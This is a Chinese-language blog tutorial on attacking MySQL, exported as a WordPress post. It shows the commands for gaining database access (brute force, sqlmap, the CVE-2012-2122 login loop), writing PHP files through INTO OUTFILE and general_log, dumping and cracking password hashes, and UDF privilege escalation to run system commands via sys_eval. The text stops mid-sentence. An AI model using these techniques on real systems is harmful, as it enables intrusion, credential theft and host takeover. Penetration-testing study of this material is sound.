{"id":353,"date":"2025-05-06T10:24:01","date_gmt":"2025-05-06T02:24:01","guid":{"rendered":"http:\/\/danielw.top\/?p=353"},"modified":"2025-05-06T10:24:01","modified_gmt":"2025-05-06T02:24:01","slug":"mysql%e6%bc%8f%e6%b4%9e%e5%88%a9%e7%94%a8%e4%b8%8e%e6%8f%90%e6%9d%83","status":"publish","type":"post","link":"http:\/\/danielw.top\/?p=353","title":{"rendered":"MySQL\u6f0f\u6d1e\u5229\u7528\u4e0e\u63d0\u6743"},"content":{"rendered":"<h1>MySQL\u6f0f\u6d1e\u5229\u7528\u4e0e\u63d0\u6743<\/h1>\n<h2>\u6743\u9650\u83b7\u53d6<\/h2>\n<h3>\u6570\u636e\u5e93\u64cd\u4f5c\u6743\u9650<\/h3>\n<p>\u63d0\u6743\u4e4b\u524d\u5f97\u5148\u62ff\u5230\u9ad8\u6743\u9650\u7684 MySQL \u7528\u6237\u624d\u53ef\u4ee5\uff0c\u62ff\u5230 MySQL \u7684\u7528\u6237\u540d\u548c\u5bc6\u7801\u7684\u65b9\u5f0f\u591a\u79cd\u591a\u6837\uff0c\u4f46\u662f\u4e0d\u5916\u4e4e\u5c31\u4e0b\u9762\u51e0\u79cd\u65b9\u6cd5\uff1a<\/p>\n<ol>\n<li>MySQL 3306 \u7aef\u53e3\u5f31\u53e3\u4ee4\u7206\u7834<\/li>\n<li>sqlmap \u6ce8\u5165\u7684 <code>--sql-shell<\/code> \u6a21\u5f0f<\/li>\n<li>\u7f51\u7ad9\u7684\u6570\u636e\u5e93\u914d\u7f6e\u6587\u4ef6\u4e2d\u62ff\u5230\u660e\u6587\u5bc6\u7801\u4fe1\u606f<\/li>\n<li>CVE-2012-2122 \u7b49\u8fd9\u7c7b\u6f0f\u6d1e\u76f4\u63a5\u62ff\u4e0b MySQL \u6743\u9650<\/li>\n<\/ol>\n<h3>Webshell \u6743\u9650<\/h3>\n<h4>into oufile \u5199 shell<\/h4>\n<ul>\n<li>\u77e5\u9053\u7f51\u7ad9\u7269\u7406\u8def\u5f84<\/li>\n<li>\u9ad8\u6743\u9650\u6570\u636e\u5e93\u7528\u6237<\/li>\n<li>load_file () \u5f00\u542f \u5373 secure_file_priv \u65e0\u9650\u5236<\/li>\n<li>\u7f51\u7ad9\u8def\u5f84\u6709\u5199\u5165\u6743\u9650<\/li>\n<\/ul>\n<p>\u9996\u5148\u57fa\u7840\u8bed\u6cd5\u67e5\u8be2\u662f\u5426 secure_file_priv \u6ca1\u6709\u9650\u5236<\/p>\n<pre><code class=\"language-sql\">mysql&gt; show global variables like &#039;%secure_file_priv%&#039;;\n+------------------+-------+\n| Variable_name    | Value |\n+------------------+-------+\n| secure_file_priv |       
|\n+------------------+-------+<\/code><\/pre>\n<table>\n<thead>\n<tr>\n<th>Value<\/th>\n<th>\u8bf4\u660e<\/th>\n<\/tr>\n<\/thead>\n<tbody>\n<tr>\n<td>NULL<\/td>\n<td>\u4e0d\u5141\u8bb8\u5bfc\u5165\u6216\u5bfc\u51fa<\/td>\n<\/tr>\n<tr>\n<td>\/tmp<\/td>\n<td>\u53ea\u5141\u8bb8\u5728 \/tmp \u76ee\u5f55\u5bfc\u5165\u5bfc\u51fa<\/td>\n<\/tr>\n<tr>\n<td>\u7a7a<\/td>\n<td>\u4e0d\u9650\u5236\u76ee\u5f55<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<blockquote>\n<p>\u5728 MySQL 5.5 \u4e4b\u524d secure_file_priv \u9ed8\u8ba4\u662f\u7a7a\uff0c\u8fd9\u4e2a\u60c5\u51b5\u4e0b\u53ef\u4ee5\u5411\u4efb\u610f\u7edd\u5bf9\u8def\u5f84\u5199\u6587\u4ef6<\/p>\n<p>\u5728 MySQL 5.5 \u4e4b\u540e secure_file_priv \u9ed8\u8ba4\u662f NULL\uff0c\u8fd9\u4e2a\u60c5\u51b5\u4e0b\u4e0d\u53ef\u4ee5\u5199\u6587\u4ef6<\/p>\n<\/blockquote>\n<p>\u5982\u679c\u6ee1\u8db3\u4e0a\u8ff0\u6240\u6709\u6761\u4ef6\u7684\u8bdd\uff0c\u90a3\u4e48\u53ef\u4ee5\u5c1d\u8bd5\u4f7f\u7528\u4e0b\u9762\u539f\u751f\u7684 SQL \u8bed\u53e5\u6765\u76f4\u63a5\u5199 shell\uff1a<\/p>\n<pre><code class=\"language-bash\">select &#039;&lt;?php phpinfo(); ?&gt;&#039; into outfile &#039;\/var\/www\/html\/info.php&#039;;<\/code><\/pre>\n<p>sqlmap \u4e2d\u53ef\u4ee5\u5982\u4e0b\u64cd\u4f5c\uff1a<\/p>\n<pre><code class=\"language-bash\">sqlmap -u &quot;http:\/\/x.x.x.x\/?id=x&quot; --file-write=&quot;\u76ee\u5f55\/shell.php&quot; --file-dest=&quot;\/var\/www\/html\/test\/shell.php&quot;<\/code><\/pre>\n<p>\u4e00\u822c\u60c5\u51b5\u4e0b Linux \u7cfb\u7edf\u4e0b\u9762\u6743\u9650\u5206\u914d\u6bd4\u8f83\u4e25\u683c\uff0cMySQL \u7528\u6237\u4e00\u822c\u60c5\u51b5\u4e0b\u662f\u65e0\u6cd5\u76f4\u63a5\u5f80\u7ad9\u70b9\u6839\u76ee\u5f55\u5199\u5165\u6587\u4ef6\u7684\uff0c\u8fd9\u79cd\u60c5\u51b5\u4e0b\u5728 Windows \u73af\u5883\u4e0b\u6210\u529f\u7387\u4f1a\u5f88\u9ad8\u3002<\/p>\n<h4>\u65e5\u5fd7\u6587\u4ef6\u5199 shell<\/h4>\n<ul>\n<li>Web \u6587\u4ef6\u5939\u5bbd\u677e\u6743\u9650\u53ef\u4ee5\u5199\u5165<\/li>\n<li>Windows 
\u7cfb\u7edf\u4e0b<\/li>\n<li>\u9ad8\u6743\u9650\u8fd0\u884c MySQL \u6216\u8005 Apache<\/li>\n<\/ul>\n<p>MySQL 5.0 \u7248\u672c\u4ee5\u4e0a\u4f1a\u521b\u5efa\u65e5\u5fd7\u6587\u4ef6\uff0c\u53ef\u4ee5\u901a\u8fc7\u4fee\u6539\u65e5\u5fd7\u7684\u5168\u5c40\u53d8\u91cf\u6765 getshell<\/p>\n<pre><code class=\"language-sql\">mysql&gt; SHOW VARIABLES LIKE &#039;general%&#039;;\n+------------------+---------------------+\n| Variable_name    | Value               |\n+------------------+---------------------+\n| general_log      | OFF                 |\n| general_log_file | DESKTOP-TFMBDA5.log |\n+------------------+---------------------+<\/code><\/pre>\n<p><code>general_log<\/code> \u9ed8\u8ba4\u5173\u95ed\uff0c\u5f00\u542f\u5b83\u53ef\u4ee5\u8bb0\u5f55\u7528\u6237\u8f93\u5165\u7684\u6bcf\u6761\u547d\u4ee4\uff0c\u4f1a\u628a\u5176\u4fdd\u5b58\u5728\u5bf9\u5e94\u7684\u65e5\u5fd7\u6587\u4ef6\u4e2d\u3002<\/p>\n<p>\u53ef\u4ee5\u5c1d\u8bd5\u81ea\u5b9a\u4e49\u65e5\u5fd7\u6587\u4ef6\uff0c\u5e76\u5411\u65e5\u5fd7\u6587\u4ef6\u91cc\u9762\u5199\u5165\u5185\u5bb9\u7684\u8bdd\uff0c\u90a3\u4e48\u5c31\u53ef\u4ee5\u6210\u529f getshell\uff1a<\/p>\n<pre><code class=\"language-bash\"># \u66f4\u6539\u65e5\u5fd7\u6587\u4ef6\u4f4d\u7f6e\nset global general_log = &quot;ON&quot;;\nset global general_log_file=&#039;\/var\/www\/html\/info.php&#039;;\n\n# \u67e5\u770b\u5f53\u524d\u914d\u7f6e\nmysql&gt; SHOW VARIABLES LIKE &#039;general%&#039;;\n+------------------+-----------------------------+\n| Variable_name    | Value                       |\n+------------------+-----------------------------+\n| general_log      | ON                          |\n| general_log_file | \/var\/www\/html\/info.php |\n+------------------+-----------------------------+\n\n# \u5f80\u65e5\u5fd7\u91cc\u9762\u5199\u5165 payload\nselect &#039;&lt;?php phpinfo();?&gt;&#039;;\n\n# \u6b64\u65f6\u5df2\u7ecf\u5199\u5230 info.php \u6587\u4ef6\u5f53\u4e2d\u4e86\nroot@c1595d3a029a:\/var\/www\/html\/$ cat info.php 
\n\/usr\/sbin\/mysqld, Version: 5.5.61-0ubuntu0.14.04.1 ((Ubuntu)). started with:\nTcp port: 3306  Unix socket: \/var\/run\/mysqld\/mysqld.sock\nTime                 Id Command    Argument\n201031 21:14:46       40 Query    SHOW VARIABLES LIKE &#039;general%&#039;\n201031 21:15:34       40 Query    select &#039;&lt;?php phpinfo();?&gt;<\/code><\/pre>\n<p>\u8fd9\u91cc\u867d\u7136\u53ef\u4ee5\u6210\u529f\u5199\u5165\uff0c\u4f46\u662f\u8fd9\u4e2a info.php \u662f MySQL \u521b\u5efa\u7684\uff1a<\/p>\n<pre><code class=\"language-bash\">-rw-rw---- 1 mysql mysql 293 Oct 31 21:15 info.php<\/code><\/pre>\n<p>Apache \u8bbf\u95ee\u8fd9\u4e2a php \u6587\u4ef6\u4f1a\u51fa\u73b0 HTTP 500 \u7684\u72b6\u6001\u7801\uff08\u5e94\u8be5\u662f\u56e0\u4e3a\u6587\u4ef6\u6743\u9650\u4e3a 660 \u4e14\u5c5e\u4e3b\u662f mysql\uff0cWeb \u670d\u52a1\u8fdb\u7a0b\u65e0\u6cd5\u8bfb\u53d6\uff09\uff0c\u7ed3\u8bba\u662f Linux \u7cfb\u7edf\u8fd9\u79cd\u60c5\u51b5\u57fa\u672c\u4e0a\u4e0d\u4f1a\u6210\u529f\uff0c\u53ea\u6709\u5728 Windows \u7cfb\u7edf\u4e0b\u6210\u529f\u7387\u4f1a\u9ad8\u4e00\u4e9b\uff0c\u4e0d\u8fc7\u8fd9\u91cc\u8fd8\u662f\u53ef\u4ee5\u5f53\u505a\u5c0f\u77e5\u8bc6\u70b9\u6765\u5b66\u4e60\u8bb0\u5f55\u3002<\/p>\n<p>\u524d\u9762\u5206\u522b\u4ecb\u7ecd\u4e86\u6570\u636e\u5e93\u6743\u9650\u548c Webshell \u6743\u9650\uff0c\u90a3\u4e48\u80fd\u4e0d\u80fd\u5229\u7528\u5df2\u7ecf\u83b7\u53d6\u5230\u7684 MySQL \u6743\u9650\u6765\u6267\u884c\u7cfb\u7edf\u4e3b\u673a\u7684\u547d\u4ee4\u5462\uff1f\u8fd9\u5c31\u662f\u4e0b\u9762\u4e3b\u8981\u4ecb\u7ecd\u7684 MySQL \u63d0\u6743\u7684\u77e5\u8bc6\u70b9\u4e86\u3002<\/p>\n<h3>Hash \u83b7\u53d6\u4e0e\u89e3\u5bc6<\/h3>\n<p>\u5047\u8bbe\u5b58\u5728 SQL \u6ce8\u5165 DBA \u6743\u9650\uff0c\u5982\u679c\u76ee\u6807 3306 \u7aef\u53e3\u4e5f\u662f\u53ef\u4ee5\u8bbf\u95ee\u901a\u7684\u8bdd\uff0c\u53ef\u4ee5\u5c1d\u8bd5\u8bfb\u53d6 MySQL \u7684 Hash \u6765\u89e3\u5bc6\uff1a<\/p>\n<pre><code class=\"language-sql\"># MySQL &lt;= 5.6 \u7248\u672c\nmysql&gt; select host, user, password from mysql.user;\n+-----------+------+-------------------------------------------+\n| host      | user | password                     
             |\n+-----------+------+-------------------------------------------+\n| localhost | root | *81F5E21E35407D884A6CD4A731AEBFB6AF209E1B |\n| 127.0.0.1 | root | *81F5E21E35407D884A6CD4A731AEBFB6AF209E1B |\n| ::1       | root | *81F5E21E35407D884A6CD4A731AEBFB6AF209E1B |\n| %         | root | *81F5E21E35407D884A6CD4A731AEBFB6AF209E1B |\n+-----------+------+-------------------------------------------+\n\n# MySQL &gt;= 5.7 \u7248\u672c\nmysql &gt; select host,user,authentication_string from mysql.user;\n+-----------------+---------------+-------------------------------------------+\n| host            | user          | authentication_string                     |\n+-----------------+---------------+-------------------------------------------+\n| localhost       | root          | *66F092A2597D7F96B152112EF0BD650432C2E9A3 |\n| localhost       | mysql.session | *THISISNOTAVALIDPASSWORDTHATCANBEUSEDHERE |\n| localhost       | mysql.sys     | *THISISNOTAVALIDPASSWORDTHATCANBEUSEDHERE |\n| 192.168.110.129 | root          | *66F092A2597D7F96B152112EF0BD650432C2E9A3 |\n+-----------------+---------------+-------------------------------------------+<\/code><\/pre>\n<p>\u83b7\u53d6\u5230\u7684 MySQL Hash \u503c\u53ef\u4ee5\u901a\u8fc7\u4e00\u4e9b\u5728\u7ebf\u7f51\u7ad9\u6765\u89e3\u5bc6\uff0c\u5982\u56fd\u5185\u7684 CMD5 \uff1a<\/p>\n<p><img decoding=\"async\" src=\"http:\/\/img.danielw.top\/image-20250506100644413.png\" alt=\"image-20250506100644413\" \/><\/p>\n<p>\u4e5f\u53ef\u4ee5\u901a\u8fc7 Hashcat \u6765\u624b\u52a8\u8dd1\u5b57\u5178\uff0c\u57fa\u672c\u4e0a\u4f7f\u7528 GPU \u7834\u89e3\u7684\u8bdd\u4e5f\u662f\u53ef\u4ee5\u79d2\u7834\u89e3\u7684\uff1a<\/p>\n<pre><code class=\"language-bash\">hashcat -a 0 -m 300 --force &#039;66F092A2597D7F96B152112EF0BD650432C2E9A3&#039; password.txt -O<\/code><\/pre>\n<p><strong>-a 
\u7834\u89e3\u6a21\u5f0f<\/strong><\/p>\n<p>\u6307\u5b9a\u8981\u4f7f\u7528\u7684\u7834\u89e3\u6a21\u5f0f\uff0c\u5176\u503c\u53c2\u8003\u540e\u9762\u7684\u53c2\u6570<\/p>\n<pre><code>- [ Attack Modes ] -\n\n  # | Mode\n ===+======\n  0 | Straight                # \u76f4\u63a5\u5b57\u5178\u7834\u89e3\n  1 | Combination             # \u7ec4\u5408\u7834\u89e3\n  3 | Brute-force             # \u63a9\u7801\u66b4\u529b\u7834\u89e3\n  6 | Hybrid Wordlist + Mask  # \u5b57\u5178+\u63a9\u7801\u7834\u89e3\n  7 | Hybrid Mask + Wordlist  # \u63a9\u7801+\u5b57\u5178\u7834\u89e3<\/code><\/pre>\n<p><strong>-m \u7834\u89e3 hash \u7c7b\u578b<\/strong><\/p>\n<p>\u6307\u5b9a\u8981\u7834\u89e3\u7684 hash \u7c7b\u578b\uff0c\u540e\u9762\u8ddf hash \u7c7b\u578b\u5bf9\u5e94\u7684\u6570\u5b57\uff0c\u5177\u4f53\u7c7b\u578b\u8be6\u89c1\u4e0b\u8868\uff1a<\/p>\n<pre><code>12   | PostgreSQL                                       | Database Server\n131  | MSSQL (2000)                                     | Database Server\n132  | MSSQL (2005)                                     | Database Server\n1731 | MSSQL (2012, 2014)                               | Database Server\n200  | MySQL323                                         | Database Server\n300  | MySQL4.1\/MySQL5                                  | Database Server\n...<\/code><\/pre>\n<p><strong>--force<\/strong><\/p>\n<p>\u5ffd\u7565\u7834\u89e3\u8fc7\u7a0b\u4e2d\u7684\u8b66\u544a\u4fe1\u606f<\/p>\n<p><strong>-O<\/strong><\/p>\n<p><code>--optimized-kernel-enable<\/code> \u542f\u7528\u4f18\u5316\u7684\u5185\u6838\uff08\u9650\u5236\u5bc6\u7801\u957f\u5ea6\uff09<\/p>\n<h3>MySQL \u5386\u53f2\u4e0a\u7684\u6f0f\u6d1e<\/h3>\n<h4>yaSSL \u7f13\u51b2\u533a\u6ea2\u51fa<\/h4>\n<p>MySQL yaSSL SSL Hello Message Buffer Overflow \u8fd9\u4e2a\u7f13\u51b2\u533a\u6ea2\u51fa\u6f0f\u6d1e 2008 
\u5e74\u5f00\u59cb\u88ab\u66dd\u51fa\u6765\uff0c\u8ddd\u79bb\u73b0\u5728\u5df2\u7ecf\u5341\u51e0\u5e74\u7684\u5386\u53f2\u4e86\uff0c\u6240\u4ee5\u8fd9\u91cc\u6ca1\u6709\u627e\u5230\u5bf9\u5e94\u7684\u73af\u5883\u6d4b\u8bd5\uff0c\u4e0d\u8fc7 MSF \u91cc\u9762\u5df2\u7ecf\u96c6\u6210\u597d\u4e86\u5bf9\u5e94\u7684\u6a21\u5757\u4e86\uff1a<\/p>\n<pre><code class=\"language-bash\">msf6 &gt; use exploit\/windows\/mysql\/mysql_yassl_hello\nmsf6 &gt; use exploit\/linux\/mysql\/mysql_yassl_hello<\/code><\/pre>\n<h4>CVE-2012-2122<\/h4>\n<p>\u77e5\u9053\u7528\u6237\u540d\u591a\u6b21\u8f93\u5165\u9519\u8bef\u7684\u5bc6\u7801\u4f1a\u6709\u51e0\u7387\u53ef\u4ee5\u76f4\u63a5\u6210\u529f\u767b\u9646\u8fdb\u6570\u636e\u5e93\uff0c\u53ef\u4ee5\u5faa\u73af 1000 \u6b21\u767b\u9646\u6570\u636e\u5e93\uff1a<\/p>\n<pre><code class=\"language-bash\">for i in `seq 1 1000`; do mysql -uroot -p111111 -h 127.0.0.1 -P3306 ; done<\/code><\/pre>\n<p>MSF \u91cc\u9762\u4e5f\u6709\u4e86\u5bf9\u5e94\u7684\u811a\u672c\u6a21\u5757\u53ef\u4ee5\u76f4\u63a5\u4f7f\u7528\uff0c\u6210\u529f\u540e\u4f1a\u76f4\u63a5 DUMP \u51fa MySQL \u7684 Hash \u503c\uff1a<\/p>\n<pre><code class=\"language-bash\">msf6 &gt; use auxiliary\/scanner\/mysql\/mysql_authbypass_hashdump\nmsf6 &gt; set rhosts 127.0.0.1\nmsf6 &gt; run<\/code><\/pre>\n<h1>UDF \u63d0\u6743<\/h1>\n<p>\u81ea\u5b9a\u4e49\u51fd\u6570\uff0c\u662f\u6570\u636e\u5e93\u529f\u80fd\u7684\u4e00\u79cd\u6269\u5c55\u3002\u7528\u6237\u901a\u8fc7\u81ea\u5b9a\u4e49\u51fd\u6570\u53ef\u4ee5\u5b9e\u73b0\u5728 MySQL \u4e2d\u65e0\u6cd5\u65b9\u4fbf\u5b9e\u73b0\u7684\u529f\u80fd\uff0c\u5176\u6dfb\u52a0\u7684\u65b0\u51fd\u6570\u90fd\u53ef\u4ee5\u5728 SQL \u8bed\u53e5\u4e2d\u8c03\u7528\uff0c\u5c31\u50cf\u8c03\u7528\u672c\u673a\u51fd\u6570 version () \u7b49\u65b9\u4fbf\u3002<\/p>\n<h2>\u624b\u5de5\u590d\u73b0<\/h2>\n<h3>\u52a8\u6001\u94fe\u63a5\u5e93<\/h3>\n<p>\u5982\u679c\u662f MySQL &gt;= 5.1 \u7684\u7248\u672c\uff0c\u5fc5\u987b\u628a UDF 
\u7684\u52a8\u6001\u94fe\u63a5\u5e93\u6587\u4ef6\u653e\u7f6e\u4e8e MySQL \u5b89\u88c5\u76ee\u5f55\u4e0b\u7684 lib\\plugin \u6587\u4ef6\u5939\u4e0b\u624d\u80fd\u521b\u5efa\u81ea\u5b9a\u4e49\u51fd\u6570\u3002<\/p>\n<p>\u90a3\u4e48\u52a8\u6001\u94fe\u63a5\u5e93\u6587\u4ef6\u53bb\u54ea\u91cc\u627e\u5462\uff1f\u5b9e\u9645\u4e0a\u6211\u4eec\u5e38\u7528\u7684\u5de5\u5177 sqlmap \u548c Metasploit \u91cc\u9762\u90fd\u81ea\u5e26\u4e86\u5bf9\u5e94\u7cfb\u7edf\u7684\u52a8\u6001\u94fe\u63a5\u5e93\u6587\u4ef6\u3002<\/p>\n<p><strong>sqlmap \u7684 UDF \u52a8\u6001\u94fe\u63a5\u5e93\u6587\u4ef6\u4f4d\u7f6e<\/strong><\/p>\n<pre><code class=\"language-bash\">sqlmap\u6839\u76ee\u5f55\/data\/udf\/mysql<\/code><\/pre>\n<p>\u4e0d\u8fc7 sqlmap \u4e2d\u81ea\u5e26\u7684\u8fd9\u4e9b\u52a8\u6001\u94fe\u63a5\u5e93\u4e3a\u4e86\u9632\u6b62\u88ab\u8bef\u6740\u90fd\u7ecf\u8fc7\u7f16\u7801\u5904\u7406\uff0c\u4e0d\u80fd\u88ab\u76f4\u63a5\u4f7f\u7528\u3002\u4e0d\u8fc7\u53ef\u4ee5\u5229\u7528 sqlmap \u81ea\u5e26\u7684\u89e3\u7801\u5de5\u5177 cloak.py \u6765\u89e3\u7801\u4f7f\u7528\uff0ccloak.py \u7684\u4f4d\u7f6e\u4e3a\uff1a<code>\/extra\/cloak\/cloak.py<\/code>\uff0c\u89e3\u7801\u65b9\u6cd5\u672c\u6587\u4e0d\u518d\u5c55\u5f00\u3002<\/p>\n<p><strong>Metasploit \u7684 UDF \u52a8\u6001\u94fe\u63a5\u5e93\u6587\u4ef6\u4f4d\u7f6e<\/strong><\/p>\n<pre><code>MSF \u6839\u76ee\u5f55\/embedded\/framework\/data\/exploits\/mysql<\/code><\/pre>\n<p>Metasploit \u81ea\u5e26\u7684\u52a8\u6001\u94fe\u63a5\u5e93\u6587\u4ef6\u65e0\u9700\u89e3\u7801\uff0c\u5f00\u7bb1\u5373\u53ef\u98df\u7528\u3002<\/p>\n<h3>\u5bfb\u627e\u63d2\u4ef6\u76ee\u5f55<\/h3>\n<p>\u63a5\u4e0b\u6765\u7684\u4efb\u52a1\u662f\u628a UDF \u7684\u52a8\u6001\u94fe\u63a5\u5e93\u6587\u4ef6\u653e\u5230 MySQL \u7684\u63d2\u4ef6\u76ee\u5f55\u4e0b\uff0c\u8fd9\u4e2a\u76ee\u5f55\u8be5\u5982\u4f55\u53bb\u5bfb\u627e\u5462\uff1f\u53ef\u4ee5\u4f7f\u7528\u5982\u4e0b\u7684 SQL \u8bed\u53e5\u6765\u67e5\u8be2\uff1a<\/p>\n<pre><code>mysql&gt; show variables like 
&#039;%plugin%&#039;;\n+---------------+------------------------------+\n| Variable_name | Value                        |\n+---------------+------------------------------+\n| plugin_dir    | \/usr\/local\/mysql\/lib\/plugin\/ |\n+---------------+------------------------------+<\/code><\/pre>\n<p>\u5982\u679c\u4e0d\u5b58\u5728\u7684\u8bdd\u53ef\u4ee5\u5728 webshell \u4e2d\u627e\u5230 MySQL \u7684\u5b89\u88c5\u76ee\u5f55\u7136\u540e\u624b\u5de5\u521b\u5efa <code>\\lib\\plugin<\/code> \u6587\u4ef6\u5939\uff1a<\/p>\n<pre><code>mysql &gt; select 233 into dumpfile &#039;C:\\\\PhpStudy\\\\PHPTutorial\\\\MySQL\\\\lib\\\\plugin::$index_allocation&#039;;<\/code><\/pre>\n<p>\u901a\u8fc7 NTFS ADS \u6d41\u521b\u5efa\u6587\u4ef6\u5939\u6210\u529f\u7387\u4e0d\u9ad8\uff0c\u76ee\u524d MySQL \u5b98\u65b9\u8c8c\u4f3c\u5df2\u7ecf\u9609\u5272\u4e86\u8fd9\u4e2a\u529f\u80fd\u3002\u90a3\u4e48\u5982\u4f55\u627e\u5230 MySQL \u7684\u5b89\u88c5\u76ee\u5f55\u5462\uff1f\u540c\u6837\u4e5f\u6709\u5bf9\u5e94\u7684 SQL \u8bed\u53e5\u53ef\u4ee5\u67e5\u8be2\u51fa\u6765\uff1a<\/p>\n<pre><code>mysql&gt; select @@basedir;\n+------------------+\n| @@basedir        |\n+------------------+\n| \/usr\/local\/mysql |\n+------------------+<\/code><\/pre>\n<h3>\u5199\u5165\u52a8\u6001\u94fe\u63a5\u5e93<\/h3>\n<p>\u5199\u5165\u52a8\u6001\u94fe\u63a5\u5e93\u53ef\u4ee5\u5206\u4e3a\u4e0b\u9762\u51e0\u79cd\u60c5\u5f62\uff1a<\/p>\n<p>SQL \u6ce8\u5165\u4e14\u662f\u9ad8\u6743\u9650\uff0cplugin \u76ee\u5f55\u53ef\u5199\u4e14\u9700\u8981 secure_file_priv \u65e0\u9650\u5236\uff0cMySQL \u63d2\u4ef6\u76ee\u5f55\u53ef\u4ee5\u88ab MySQL \u7528\u6237\u5199\u5165\uff0c\u8fd9\u4e2a\u65f6\u5019\u5c31\u53ef\u4ee5\u76f4\u63a5\u4f7f\u7528 sqlmap \u6765\u4e0a\u4f20\u52a8\u6001\u94fe\u63a5\u5e93\uff0c\u53c8\u56e0\u4e3a GET \u6709<strong>\u5b57\u8282\u957f\u5ea6\u9650\u5236<\/strong>\uff0c\u6240\u4ee5\u5f80\u5f80 POST \u6ce8\u5165\u624d\u53ef\u4ee5\u6267\u884c\u8fd9\u79cd\u653b\u51fb<\/p>\n<pre><code>sqlmap -u 
&quot;http:\/\/localhost:30008\/&quot; --data=&quot;id=1&quot; --file-write=&quot;\/Users\/sec\/Desktop\/lib_mysqludf_sys_64.so&quot; --file-dest=&quot;\/usr\/lib\/mysql\/plugin\/udf.so&quot;<\/code><\/pre>\n<p><a href=\"https:\/\/image.3001.net\/images\/20201117\/16055961029549.png\" alt=\"MySQL\u6f0f\u6d1e\u5229\u7528\u4e0e\u63d0\u6743\" title=\"MySQL\u6f0f\u6d1e\u5229\u7528\u4e0e\u63d0\u6743\" target=\"_blank\"  rel=\"nofollow\" ><img decoding=\"async\" src=\"https:\/\/image.3001.net\/images\/20201117\/16055961029549.png\" alt=\"img\" \/><\/a> <\/p>\n<ol>\n<li>\u5982\u679c\u6ca1\u6709\u6ce8\u5165\u7684\u8bdd\uff0c\u6211\u4eec\u53ef\u4ee5\u64cd\u4f5c\u539f\u751f SQL \u8bed\u53e5\uff0c\u8fd9\u79cd\u60c5\u51b5\u4e0b\u5f53 secure_file_priv \u65e0\u9650\u5236\u7684\u65f6\u5019\uff0c\u6211\u4eec\u4e5f\u662f\u53ef\u4ee5\u624b\u5de5\u5199\u6587\u4ef6\u5230 plugin \u76ee\u5f55\u4e0b\u7684\uff1a<\/li>\n<\/ol>\n<pre><code># \u76f4\u63a5 SELECT \u67e5\u8be2\u5341\u516d\u8fdb\u5236\u5199\u5165\nSELECT 0x7f454c4602... 
INTO DUMPFILE &#039;\/usr\/lib\/mysql\/plugin\/udf.so&#039;;\n\n# \u89e3\u7801\u5341\u516d\u8fdb\u5236\u518d\u5199\u5165\u591a\u6b64\u4e00\u4e3e\nSELECT unhex(&#039;7f454c4602...&#039;) INTO DUMPFILE &#039;\/usr\/lib\/mysql\/plugin\/udf.so&#039;;<\/code><\/pre>\n<p>\u8fd9\u91cc\u7684\u5341\u516d\u8fdb\u5236\u600e\u4e48\u83b7\u53d6\u5462\uff1f\u53ef\u4ee5\u5229\u7528 MySQL \u81ea\u5e26\u7684 hex \u51fd\u6570\u6765\u7f16\u7801\uff1a<\/p>\n<pre><code># \u76f4\u63a5\u4f20\u5165\u8def\u5f84\u7f16\u7801\nSELECT hex(load_file(&#039;\/lib_mysqludf_sys_64.so&#039;));\n\n# \u4e5f\u53ef\u4ee5\u5c06\u8def\u5f84 hex \u7f16\u7801\nSELECT hex(load_file(0x2f6c69625f6d7973716c7564665f7379735f36342e736f));<\/code><\/pre>\n<p>\u4e00\u822c\u4e3a\u4e86\u66f4\u65b9\u4fbf\u89c2\u5bdf\uff0c\u53ef\u4ee5\u5c06\u7f16\u7801\u540e\u7684\u7ed3\u679c\u5bfc\u5165\u5230\u65b0\u7684\u6587\u4ef6\u4e2d\u65b9\u4fbf\u89c2\u5bdf\uff1a<\/p>\n<pre><code>SELECT hex(load_file(&#039;\/lib_mysqludf_sys_64.so&#039;)) into dumpfile &#039;\/tmp\/udf.txt&#039;; \n\nSELECT hex(load_file(0x2f6c69625f6d7973716c7564665f7379735f36342e736f)) into dumpfile &#039;\/tmp\/udf.txt&#039;;<\/code><\/pre>\n<p>\u4e3a\u4e86\u65b9\u4fbf\u5927\u5bb6\u76f4\u63a5\u590d\u5236\uff0c\u56fd\u5149\u8fd9\u91cc\u5355\u72ec\u5199\u4e86\u4e2a\u9875\u9762\uff0c\u6709\u610f\u8005\u81ea\u53d6\uff1a<a href=\"https:\/\/www.sqlsec.com\/tools\/udf.html\" target=\"_blank\"  rel=\"nofollow\" >MySQL UDF \u63d0\u6743\u5341\u516d\u8fdb\u5236\u67e5\u8be2<\/a><\/p>\n<blockquote>\n<pre><code><\/code><\/pre>\n<pre><code>ERROR 1126 (HY000): Can't open shared library 'udf.dll' (errno: 193 )<\/code><\/pre>\n<p>\u7f51\u53cb\u4eec\u53ef\u80fd\u770b\u5230\u8fd9\u4e2a\u62a5\u9519\uff0c\u56e0\u4e3a lib_mysqludf_sys_64.dll \u5931\u8d25\uff0c\u6700\u540e\u4f7f\u7528  lib_mysqludf_sys_32.dll \u624d\u6210\u529f\uff0c\u6240\u4ee5\u8fd9\u91cc\u7684 dll \u5e94\u8be5\u548c\u7cfb\u7edf\u4f4d\u6570\u65e0\u5173\uff0c\u53ef\u80fd\u548c MySQL 
\u7684\u5b89\u88c5\u7248\u672c\u6709\u5173\u7cfb\uff0c\u800c  PHPStudy \u81ea\u5e26\u7684 MySQL \u7248\u672c\u662f 32 \u4f4d\u7684<\/p>\n<\/blockquote>\n<h3>\u521b\u5efa\u81ea\u5b9a\u4e49\u51fd\u6570\u5e76\u8c03\u7528\u547d\u4ee4<\/h3>\n<pre><code>mysql &gt; CREATE FUNCTION sys_eval RETURNS STRING SONAME &#039;udf.dll&#039;;<\/code><\/pre>\n<p>\u5bfc\u5165\u6210\u529f\u540e\u67e5\u770b\u4e00\u4e0b mysql \u51fd\u6570\u91cc\u9762\u662f\u5426\u65b0\u589e\u4e86 sys_eval\uff1a<\/p>\n<pre><code>mysql&gt; select * from mysql.func;\n+----------+-----+---------+----------+\n| name     | ret | dl      | type     |\n+----------+-----+---------+----------+\n| sys_eval |   0 | udf.dll | function |\n+----------+-----+---------+----------+<\/code><\/pre>\n<p>\u8fd9\u91cc\u7684 sys_eval \u652f\u6301\u81ea\u5b9a\u4e49\uff0c\u63a5\u7740\u5c31\u53ef\u4ee5\u901a\u8fc7\u521b\u5efa\u7684\u8fd9\u4e2a\u51fd\u6570\u6765\u6267\u884c\u7cfb\u7edf\u547d\u4ee4\u4e86\uff1a<\/p>\n<pre><code>mysql &gt; select sys_eval(&#039;whoami&#039;);<\/code><\/pre>\n<p>\u5982\u679c\u5728 Windows \u7cfb\u7edf\u4e0b\u7684\u8bdd\u5e94\u8be5\u5c31\u662f\u6700\u9ad8\u6743\u9650\u4e86\uff0c\u6267\u884c\u4e00\u4e9b net user 